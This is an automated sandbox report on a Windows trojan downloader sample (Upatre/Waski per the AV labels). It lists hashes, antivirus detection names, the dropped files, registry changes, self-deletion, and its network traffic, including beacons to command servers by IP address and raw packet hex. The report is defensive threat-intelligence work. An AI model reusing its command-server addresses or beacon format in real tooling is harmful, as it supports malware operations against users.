Analysis Date2015-09-15 17:46:30
MD5bff0650130a09a7efa0e0f050bc0ece0
SHA1c7a30d2b6592f1857f2aa8f9e38b8fa05c209a87

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Sectiontext md5: b8f6f9e0dee4beb21198de5c73194e26 sha1: 900343f979f7e753d40783ce041fce5e799e2465 size: 2560
Section.data md5: 4a3bbbf2d427502ff2bc91e0da1e6448 sha1: bd60991f782f3f5005f290f2b0ebe1e52fbec669 size: 11776
Section.rsrc md5: 84b1be47d958e8bd72295b8531ad4e9f sha1: 25d3cfbdd8e6c6fdb2929e66e649dbd8d0ea31f8 size: 26112
Section.reloc md5: 8488827c1acd923be7f954f455932af8 sha1: b658034a7f0cfec8e6552d0b80f841fc607b31f3 size: 512
Section.DAT md5: 093396bb640711c04a1d49526b33f00d sha1: 6befc0c362d707b26c005b3963c0c6f8c9371613 size: 512
Timestamp1997-10-28 22:08:58
PEhashfcc5aab56bee31ec645c989eebd1fea8fb919601
IMPhashc312bb98cf45e74c770b5ff6a8bd003b
AVCA (E-Trust Ino)no_virus
AVRisingno_virus
AVMcafeeUpatre-FABT!BFF0650130A0
AVAvira (antivir)TR/Kryptik.gtas
AVTwisterTrojan.Generic.lbhj
AVAd-AwareTrojan.Agent.BJIS
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/TrojanDownloader.Waski.F
AVGrisoft (avg)Crypt4.TLF
AVSymantecDownloader.Upatre!gen9
AVFortinetW32/Waski.F!tr
AVBitDefenderTrojan.Agent.BJIS
AVK7Trojan-Downloader ( 0049d22b1 )
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.BL
AVMicroWorld (escan)Trojan.Agent.BJIS
AVMalwareBytesSpyware.Dyre
AVAuthentiumW32/Upatre.E.gen
AVFrisk (f-prot)W32/Upatre.E.gen
AVIkarusTrojan.Injector
AVEmsisoftTrojan.Agent.BJIS
AVZillya!Downloader.Waski.Win32.4402
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_UP.DB5F9D28
AVCAT (quickheal)TrojanDwnldr.Upatre.MUE.A5
AVVirusBlokAda (vba32)Trojan.AntiAV
AVPadvishno_virus
AVBullGuardTrojan.Agent.BJIS
AVArcabit (arcavir)Trojan.Agent.BJIS
AVClamAVno_virus
AVDr. WebTrojan.Upatre.201
AVF-SecureTrojan.Agent.BJIS

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\zil7812.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\zilinad.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\zilinad.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\zilinad.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS46.16.225.236
Winsock DNS81.7.109.65
Winsock DNS85.248.2.228
Winsock DNS95.80.123.41
Winsock DNS5.44.15.70
Winsock DNS128.0.85.11
Winsock DNS91.240.97.54
Winsock DNS46.151.130.90
Winsock DNSicanhazip.com

Network Details:

DNSicanhazip.com
Type: A
104.238.141.75
DNSicanhazip.com
Type: A
104.238.136.31
DNSicanhazip.com
Type: A
104.238.145.30
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
HTTP GEThttp://81.7.109.65:13401/WANS22/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Flows TCP192.168.1.1:1031 ➝ 104.238.141.75:80
Flows TCP192.168.1.1:1032 ➝ 81.7.109.65:13401
Flows TCP192.168.1.1:1033 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1034 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1035 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1036 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1037 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1038 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1039 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1040 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1041 ➝ 5.44.15.70:443
Flows TCP192.168.1.1:1042 ➝ 5.44.15.70:443
Flows TCP192.168.1.1:1043 ➝ 5.44.15.70:443
Flows TCP192.168.1.1:1044 ➝ 5.44.15.70:443
Flows TCP192.168.1.1:1045 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1046 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1047 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1048 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1049 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1050 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1051 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1052 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1053 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1054 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1055 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1056 ➝ 91.240.97.54:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 72763a33 342e3029   NT 6.1; rv:34.0)
0x00000060 (00096)   20476563 6b6f2f32 30313030 31303120    Gecko/20100101 
0x00000070 (00112)   46697265 666f782f 33342e30 0d0a486f   Firefox/34.0..Ho
0x00000080 (00128)   73743a20 6963616e 68617a69 702e636f   st: icanhazip.co
0x00000090 (00144)   6d0d0a43 61636865 2d436f6e 74726f6c   m..Cache-Control
0x000000a0 (00160)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f57414e 5332322f 434f4d50   GET /WANS22/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 30202857 696e646f   zilla/5.0 (Windo
0x00000050 (00080)   7773204e 5420362e 313b2072 763a3334   ws NT 6.1; rv:34
0x00000060 (00096)   2e302920 4765636b 6f2f3230 31303031   .0) Gecko/201001
0x00000070 (00112)   30312046 69726566 6f782f33 342e300d   01 Firefox/34.0.
0x00000080 (00128)   0a486f73 743a2038 312e372e 3130392e   .Host: 81.7.109.
0x00000090 (00144)   36353a31 33343031 0d0a4361 6368652d   65:13401..Cache-
0x000000a0 (00160)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000b0 (00176)   650d0a0d 0a                           e....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings